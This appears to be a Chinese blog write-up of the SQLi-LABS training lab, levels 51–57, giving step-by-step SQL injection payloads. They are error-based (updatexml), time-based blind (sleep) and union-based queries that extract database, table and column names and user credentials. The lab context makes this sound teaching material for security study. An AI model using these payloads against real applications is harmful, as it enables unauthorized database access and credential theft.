当前位置: 首页 > news >正文

SQL注入SQLi-LABS 靶场less51-57详细通关攻略

news 2025/8/7 15:58:22

Less 51 GET -Error based -ORDER BY CLAUSE -String -Stacked injection

一、注入方式

对的时候存在回显,错的时候有报错注入的使用函数,使用报错注入。

二、获取数据库名

抓包后放到攻击模块进行爆破,因为sleep超时所以出不来结果的就是正确值,下几条命令同理。

-1' and updatexml(1,concat(1,database()),1) --+

三、获取数据表名

-1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1) --+

四、获取数据字段名

-1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name = 'users' )),1) --+

五、获取数据信息

获取用户名和密码时更改第一个1即可。

-1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),3)

Less 52 GET -Blind based -ORDER BY CLAUSE -numeric -Stacked injection

一、注入方式

对的时候存在回显,错的时候没有任何的回显信息,使用时间盲注。

二、获取数据库名

抓包后放到攻击模块进行爆破,因为sleep超时所以出不来结果的就是正确值,下几条命令同理。

1 and if((substr(database(),1,1))='s',sleep(5),1)

三、获取数据表名

1 and  if(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='s',sleep(4),1)

四、获取数据字段名

1 and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name = users limit 1,1),1,1)='s',sleep(4),1)

五、获取数据信息

获取用户名和密码时更改第一个1即可。

1 and if(substr((select username from users limit 1,1),1,1)='s',sleep(4),1) 
1 and if(substr((select password from users limit 1,1),1,1)='s',sleep(4),1)

Less 53 GET -Blind based -ORDER BY CLAUSE -String -Stacked injection

一、注入方式

对的时候存在回显,错的时候没有任何的回显信息,使用时间盲注。

二、获取数据库名

抓包后放到攻击模块进行爆破,因为sleep超时所以出不来结果的就是正确值,下几条命令同理。

1' and if((substr(database(),1,1)='s'),sleep(1),1)--+

三、获取数据表名

1' and  if(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='s',sleep(1),1)

四、获取数据字段名

1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name = users limit 1,1),1,1)='s',sleep(1),1)

五、获取数据信息

获取用户名和密码时更改第一个1即可。

1' and if(substr((select username from users limit 1,1),1,1)='s',sleep(1),1) 
1' and if(substr((select password from users limit 1,1),1,1)='s',sleep(1),1)

Less 54 GET challenge -Union-10 queries allow -Varation

一、判断注入方式

这页面也没有什么提示,提示我们只有十次查询机会,超过十次会进行重置,所以尽量在十次内搞出来数据库详细信息。

二、判断闭合方式

1' and 1=1 --+
1' and 1=2 --+

三、数据库名

1' union select 1,2,3 --+
1' union select 1,database(),3 --+

四、数据表名

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

五、字段名

-1' union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='mkp5cq36jp') --+

六、详细信息

-1' union select 1,2,(select secret_Y0T6 from mkp5cq36jp)--+

Less 55 GET challenge -Union-14 queries allow -Varation2

一、判断闭合方式

1) and 1=1 --+
1) and 1=2 --+

二、数据库名

-1) union select 1,2,3 --+
-1) union select 1,database(),3 --+

三、数据表名

-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

四、字段名

-1) union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='twnipcr6qo') --+

五、详细信息

-1) union select 1,2,(select secret_5O8L from twnipcr6qo)--+

Less 56 GET challenge -Union-14 queries allow -Varation3

一、判断闭合方式

1') and 1=1 --+
1') and 1=2 --+

二、数据库名

-1') union select 1,2,3 --+
-1') union select 1,database(),3 --+

三、数据表名

-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

四、字段名

-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='40s270z681') --+

五、详细信息

-1') union select 1,2,(select secret_ETWO from 40s270z681)--+

Less 57 GET challenge -Union-14 queries allow -Varation4

一、判断闭合方式

1" and 1=1 --+
1" and 1=2 --+

二、数据库名

-1" union select 1,2,3 --+
-1" union select 1,database(),3 --+

三、数据表名

-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

四、字段名

-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='40s270z681') --+

五、详细信息

-1" union select 1,2,(select secret_ETWO from 40s270z681)--+

http://www.dtcms.com/a/318671.html

相关文章:

  • 【2026版】JVM面试题
  • K8S的POD数量限制
  • 敏捷协作平台推荐:Jira、PingCode、Tapd等15款
  • C++ - 仿 RabbitMQ 实现消息队列--网络通信协议设计
  • 力扣-42.接雨水
  • 云平台托管集群:EKS、GKE、AKS 深度解析与选型指南-第二章
  • java 桌面应用程序基本框架
  • 【算法训练营Day21】回溯算法part3
  • C语言:指针(1-2)
  • 亚马逊新品实现快速起量:如何设置有效的广告竞价策略
  • Java保姆级新手教程第三章(方法与数组)
  • 亚马逊广告进阶指南:广告转化的基本原理
  • 前端性能优化实战:电商首页从 10s 加载到 1s 的踩坑与复盘
  • 大数据存储域——HDFS存储系统
  • 在LLM小型化趋势下,AI Infra需要做出哪些相应调整?
  • 用 “私房钱” 类比闭包:为啥它能访问外部变量?
  • 日记研究:一种深入了解用户真实体验的UX研究方法
  • 【2025CVPR-目标检测方向】FIRE:通过频率引导重建误差对扩散生成的图像进行鲁棒检测
  • 2025AI论文工具测评?个人实测5款AI工具论文写作使用体验对比
  • 【pytorch(02)】Tensor(张量)概述、如何创建、常见属性,切换设备
  • 【0基础PS】PS工具详解--直接选择工具
  • TypeScript 数组类型精简知识点
  • 文本编码扫盲及设计思路总结
  • Mongodb入门介绍
  • [Python 基础课程]学生语文成绩录入和查询需求
  • [假面骑士] 555浅谈
  • AI大语言模型如何重塑软件开发与测试流程
  • Linux操作系统启动项相关研究与总结
  • 高速信号设计之 UPI2.0 篇
  • Spring Security 框架深度集成与开发指南